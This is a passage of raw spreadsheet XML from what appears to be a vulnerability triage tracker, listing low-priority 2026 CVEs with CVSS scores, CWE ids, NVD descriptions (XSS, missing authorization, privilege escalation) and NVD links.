attacker to execute code locally.</t></is></c><c r="T1176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t></is></c></row><row r="1177"><c r="A1177" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1177" s="5" t="inlineStr"><is><t>CVE-2026-53639</t></is></c><c r="D1177" s="5" t="n"><v>6.3</v></c><c r="E1177" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1177" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1177" s="5" t="inlineStr" /><c r="H1177" s="5" t="n"><v>0.005</v></c><c r="I1177" s="5" t="inlineStr" /><c r="J1177" s="5" t="inlineStr" /><c r="K1177" s="5" t="inlineStr" /><c r="L1177" s="5" t="inlineStr" /><c r="M1177" s="5" t="inlineStr" /><c r="N1177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1177" s="5" t="inlineStr" /><c r="R1177" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1177" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t></is></c><c r="T1177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t></is></c></row><row r="1178"><c r="A1178" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1178" s="5" t="inlineStr"><is><t>CVE-2026-81824</t></is></c><c r="D1178" s="5" t="n"><v>6.3</v></c><c r="E1178" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1178" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1178" s="5" t="inlineStr" /><c r="H1178" s="5" t="n"><v>0.002</v></c><c r="I1178" s="5" t="inlineStr" /><c r="J1178" s="5" t="inlineStr" /><c r="K1178" s="5" t="inlineStr" /><c r="L1178" s="5" t="inlineStr" /><c r="M1178" s="5" t="inlineStr" /><c r="N1178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1178" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1178" s="5" t="inlineStr" /><c r="R1178" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1178" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t></is></c><c r="T1178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t></is></c></row><row r="1179"><c r="A1179" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1179" s="5" t="inlineStr"><is><t>CVE-2026-81904</t></is></c><c r="D1179" s="5" t="n"><v>6.3</v></c><c r="E1179" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1179" s="5" t="inlineStr"><is><t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t></is></c><c r="G1179" s="5" t="inlineStr" /><c r="H1179" s="5" t="n"><v>0.003</v></c><c r="I1179" s="5" t="inlineStr" /><c r="J1179" s="5" t="inlineStr" /><c r="K1179" s="5" t="inlineStr" /><c r="L1179" s="5" t="inlineStr" /><c r="M1179" s="5" t="inlineStr" /><c r="N1179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1179" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1179" s="5" t="inlineStr" /><c r="R1179" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1179" s="5" t="inlineStr"><is><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is></c><c r="T1179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t></is></c></row><row r="1180"><c r="A1180" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1180" s="5" t="inlineStr"><is><t>CVE-2026-81994</t></is></c><c r="D1180" s="5" t="n"><v>6.3</v></c><c r="E1180" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1180" s="5" t="inlineStr" /><c r="H1180" s="5" t="n"><v>0.003</v></c><c r="I1180" s="5" t="inlineStr" /><c r="J1180" s="5" t="inlineStr" /><c r="K1180" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1180" s="5" t="inlineStr" /><c r="M1180" s="5" t="inlineStr" /><c r="N1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1180" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1180" s="5" t="inlineStr" /><c r="R1180" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1180" s="5" t="inlineStr"><is><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is></c><c r="T1180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t></is></c></row><row r="1181"><c r="A1181" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1181" s="5" t="inlineStr"><is><t>CVE-2026-81997</t></is></c><c r="D1181" s="5" t="n"><v>6.3</v></c><c r="E1181" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1181" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1181" s="5" t="inlineStr" /><c r="H1181" s="5" t="n"><v>0.002</v></c><c r="I1181" s="5" t="inlineStr" /><c r="J1181" s="5" t="inlineStr" /><c r="K1181" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1181" s="5" t="inlineStr" /><c r="M1181" s="5" t="inlineStr" /><c r="N1181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1181" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1181" s="5" t="inlineStr" /><c r="R1181" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1181" s="5" t="inlineStr"><is><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is></c><c r="T1181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t></is></c></row><row r="1182"><c r="A1182" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1182" s="5" t="inlineStr"><is><t>CVE-2026-84942</t></is></c><c r="D1182" s="5" t="n"><v>6.3</v></c><c r="E1182" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1182" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1182" s="5" t="inlineStr" /><c r="H1182" s="5" t="n"><v>0.003</v></c><c r="I1182" s="5" t="inlineStr" /><c r="J1182" s="5" t="inlineStr" /><c r="K1182" s="5" t="inlineStr" /><c r="L1182" s="5" t="inlineStr" /><c r="M1182" s="5" t="inlineStr" /><c r="N1182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1182" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1182" s="5" t="inlineStr" /><c r="R1182" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1182" s="5" t="inlineStr"><is><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is></c><c r="T1182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t></is></c></row><row r="1183"><c r="A1183" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1183" s="5" t="inlineStr"><is><t>CVE-2026-86590</t></is></c><c r="D1183" s="5" t="n"><v>6.3</v></c><c r="E1183" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1183" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G1183" s="5" t="inlineStr" /><c r="H1183" s="5" t="n"><v>0.004</v></c><c r="I1183" s="5" t="inlineStr" /><c r="J1183" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1183" s="5" t="inlineStr" /><c r="L1183" s="5" t="inlineStr" /><c r="M1183" s="5" t="inlineStr" /><c r="N1183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1183" s="5" t="inlineStr" /><c r="R1183" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1183" s="5" t="inlineStr"><is><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is></c><c r="T1183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t></is></c></row><row r="1184"><c r="A1184" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1184" s="5" t="inlineStr"><is><t>CVE-2026-18090</t></is></c><c r="D1184" s="5" t="n"><v>6.1</v></c><c r="E1184" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1184" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1184" s="5" t="inlineStr" /><c r="H1184" s="5" t="n"><v>0.002</v></c><c r="I1184" s="5" t="inlineStr" /><c r="J1184" s="5" t="inlineStr" /><c r="K1184" s="5" t="inlineStr" /><c r="L1184" s="5" t="inlineStr" /><c r="M1184" s="5" t="inlineStr" /><c r="N1184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1184" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1184" s="5" t="inlineStr" /><c r="R1184" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1184" s="5" t="inlineStr"><is><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is></c><c r="T1184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t></is></c></row><row r="1185"><c r="A1185" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1185" s="5" t="inlineStr"><is><t>CVE-2026-19872</t></is></c><c r="D1185" s="5" t="n"><v>6.1</v></c><c r="E1185" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1185" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1185" s="5" t="inlineStr" /><c r="H1185" s="5" t="n"><v>0.003</v></c><c r="I1185" s="5" t="inlineStr" /><c r="J1185" s="5" t="inlineStr" /><c r="K1185" s="5" t="inlineStr" /><c r="L1185" s="5" t="inlineStr" /><c r="M1185" s="5" t="inlineStr" /><c r="N1185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1185" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1185" s="5" t="inlineStr" /><c r="R1185" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1185" s="5" t="inlineStr"><is><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is></c><c r="T1185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t></is></c></row><row r="1186"><c r="A1186" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1186" s="5" t="inlineStr"><is><t>CVE-2026-63523</t></is></c><c r="D1186" s="5" t="n"><v>6.1</v></c><c r="E1186" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1186" s="5" t="inlineStr" /><c r="H1186" s="5" t="n"><v>0.007</v></c><c r="I1186" s="5" t="inlineStr" /><c r="J1186" s="5" t="inlineStr" /><c r="K1186" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1186" s="5" t="inlineStr" /><c r="M1186" s="5" t="inlineStr" /><c r="N1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1186" s="5" t="inlineStr" /><c r="R1186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1186" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t></is></c></row><row r="1187"><c r="A1187" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1187" s="5" t="inlineStr"><is><t>CVE-2026-69642</t></is></c><c r="D1187" s="5" t="n"><v>6.1</v></c><c r="E1187" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1187" s="5" t="inlineStr" /><c r="H1187" s="5" t="n"><v>0.003</v></c><c r="I1187" s="5" t="inlineStr" /><c r="J1187" s="5" t="inlineStr" /><c r="K1187" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1187" s="5" t="inlineStr" /><c r="M1187" s="5" t="inlineStr" /><c r="N1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1187" s="5" t="inlineStr" /><c r="R1187" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1187" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t></is></c></row><row r="1188"><c r="A1188" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1188" s="5" t="inlineStr"><is><t>CVE-2026-76002</t></is></c><c r="D1188" s="5" t="n"><v>6.1</v></c><c r="E1188" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1188" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1188" s="5" t="inlineStr" /><c r="H1188" s="5" t="n"><v>0.007</v></c><c r="I1188" s="5" t="inlineStr" /><c r="J1188" s="5" t="inlineStr" /><c r="K1188" s="5" t="inlineStr" /><c r="L1188" s="5" t="inlineStr" /><c r="M1188" s="5" t="inlineStr" /><c r="N1188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1188" s="5" t="inlineStr" /><c r="R1188" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1188" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t></is></c><c r="T1188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t></is></c></row><row r="1189"><c r="A1189" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1189" s="5" t="inlineStr"><is><t>CVE-2026-77654</t></is></c><c r="D1189" s="5" t="n"><v>6.1</v></c><c r="E1189" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1189" s="5" t="inlineStr"><is><t>security.vulnerabilities@algosec.com</t></is></c><c r="G1189" s="5" t="inlineStr" /><c r="H1189" s="5" t="n"><v>0.001</v></c><c r="I1189" s="5" t="inlineStr" /><c r="J1189" s="5" t="inlineStr" /><c r="K1189" s="5" t="inlineStr" /><c r="L1189" s="5" t="inlineStr" /><c r="M1189" s="5" t="inlineStr" /><c r="N1189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1189" s="5" t="inlineStr" /><c r="R1189" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1189" s="5" t="inlineStr"><is><t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.

A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 


This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t></is></c><c r="T1189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t></is></c></row><row r="1190"><c r="A1190" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1190" s="5" t="inlineStr"><is><t>CVE-2026-78738</t></is></c><c r="D1190" s="5" t="n"><v>6.1</v></c><c r="E1190" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1190" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1190" s="5" t="inlineStr" /><c r="H1190" s="5" t="n"><v>0.002</v></c><c r="I1190" s="5" t="inlineStr" /><c r="J1190" s="5" t="inlineStr" /><c r="K1190" s="5" t="inlineStr" /><c r="L1190" s="5" t="inlineStr" /><c r="M1190" s="5" t="inlineStr" /><c r="N1190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1190" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1190" s="5" t="inlineStr" /><c r="R1190" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1190" s="5" t="inlineStr"><is><t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t></is></c><c r="T1190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t></is></c></row><row r="1191"><c r="A1191" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1191" s="5" t="inlineStr"><is><t>CVE-2026-78741</t></is></c><c r="D1191" s="5" t="n"><v>6.1</v></c><c r="E1191" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1191" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1191" s="5" t="inlineStr" /><c r="H1191" s="5" t="n"><v>0.002</v></c><c r="I1191" s="5" t="inlineStr" /><c r="J1191" s="5" t="inlineStr" /><c r="K1191" s="5" t="inlineStr" /><c r="L1191" s="5" t="inlineStr" /><c r="M1191" s="5" t="inlineStr" /><c r="N1191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1191" s="5" t="inlineStr" /><c r="R1191" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1191" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t></is></c><c r="T1191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t></is></c></row><row r="1192"><c r="A1192" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1192" s="5" t="inlineStr"><is><t>CVE-2026-78742</t></is></c><c r="D1192" s="5" t="n"><v>6.1</v></c><c r="E1192" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1192" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1192" s="5" t="inlineStr" /><c r="H1192" s="5" t="n"><v>0.002</v></c><c r="I1192" s="5" t="inlineStr" /><c r="J1192" s="5" t="inlineStr" /><c r="K1192" s="5" t="inlineStr" /><c r="L1192" s="5" t="inlineStr" /><c r="M1192" s="5" t="inlineStr" /><c r="N1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1192" s="5" t="inlineStr" /><c r="R1192" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1192" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t></is></c><c r="T1192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t></is></c></row><row r="1193"><c r="A1193" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1193" s="5" t="inlineStr"><is><t>CVE-2026-85484</t></is></c><c r="D1193" s="5" t="n"><v>6.1</v></c><c r="E1193" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1193" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1193" s="5" t="inlineStr" /><c r="H1193" s="5" t="n"><v>0.003</v></c><c r="I1193" s="5" t="inlineStr" /><c r="J1193" s="5" t="inlineStr" /><c r="K1193" s="5" t="inlineStr" /><c r="L1193" s="5" t="inlineStr" /><c r="M1193" s="5" t="inlineStr" /><c r="N1193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1193" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1193" s="5" t="inlineStr" /><c r="R1193" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1193" s="5" t="inlineStr"><is><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is></c><c r="T1193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t></is></c></row><row r="1194"><c r="A1194" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1194" s="5" t="inlineStr"><is><t>CVE-2026-85485</t></is></c><c r="D1194" s="5" t="n"><v>6.1</v></c><c r="E1194" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1194" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1194" s="5" t="inlineStr" /><c r="H1194" s="5" t="n"><v>0.002</v></c><c r="I1194" s="5" t="inlineStr" /><c r="J1194" s="5" t="inlineStr" /><c r="K1194" s="5" t="inlineStr" /><c r="L1194" s="5" t="inlineStr" /><c r="M1194" s="5" t="inlineStr" /><c r="N1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1194" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1194" s="5" t="inlineStr" /><c r="R1194" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1194" s="5" t="inlineStr"><is><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is></c><c r="T1194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t></is></c></row><row r="1195"><c r="A1195" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1195" s="5" t="inlineStr"><is><t>CVE-2026-85630</t></is></c><c r="D1195" s="5" t="n"><v>6.1</v></c><c r="E1195" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1195" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1195" s="5" t="inlineStr" /><c r="H1195" s="5" t="n"><v>0.003</v></c><c r="I1195" s="5" t="inlineStr" /><c r="J1195" s="5" t="inlineStr" /><c r="K1195" s="5" t="inlineStr" /><c r="L1195" s="5" t="inlineStr" /><c r="M1195" s="5" t="inlineStr" /><c r="N1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1195" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1195" s="5" t="inlineStr" /><c r="R1195" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1195" s="5" t="inlineStr"><is><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is></c><c r="T1195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t></is></c></row><row r="1196"><c r="A1196" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1196" s="5" t="inlineStr"><is><t>CVE-2026-56101</t></is></c><c r="D1196" s="5" t="n"><v>6</v></c><c r="E1196" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1196" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1196" s="5" t="inlineStr" /><c r="H1196" s="5" t="n"><v>0.004</v></c><c r="I1196" s="5" t="inlineStr" /><c r="J1196" s="5" t="inlineStr" /><c r="K1196" s="5" t="inlineStr" /><c r="L1196" s="5" t="inlineStr" /><c r="M1196" s="5" t="inlineStr" /><c r="N1196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1196" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1196" s="5" t="inlineStr" /><c r="R1196" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S1196" s="5" t="inlineStr"><is><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is></c><c r="T1196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t></is></c></row><row r="1197"><c r="A1197" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1197" s="5" t="inlineStr"><is><t>CVE-2026-78216</t></is></c><c r="D1197" s="5" t="n"><v>6</v></c><c r="E1197" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1197" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1197" s="5" t="inlineStr" /><c r="H1197" s="5" t="n"><v>0.002</v></c><c r="I1197" s="5" t="inlineStr" /><c r="J1197" s="5" t="inlineStr" /><c r="K1197" s="5" t="inlineStr" /><c r="L1197" s="5" t="inlineStr" /><c r="M1197" s="5" t="inlineStr" /><c r="N1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1197" s="5" t="inlineStr" /><c r="R1197" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1197" s="5" t="inlineStr"><is><t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

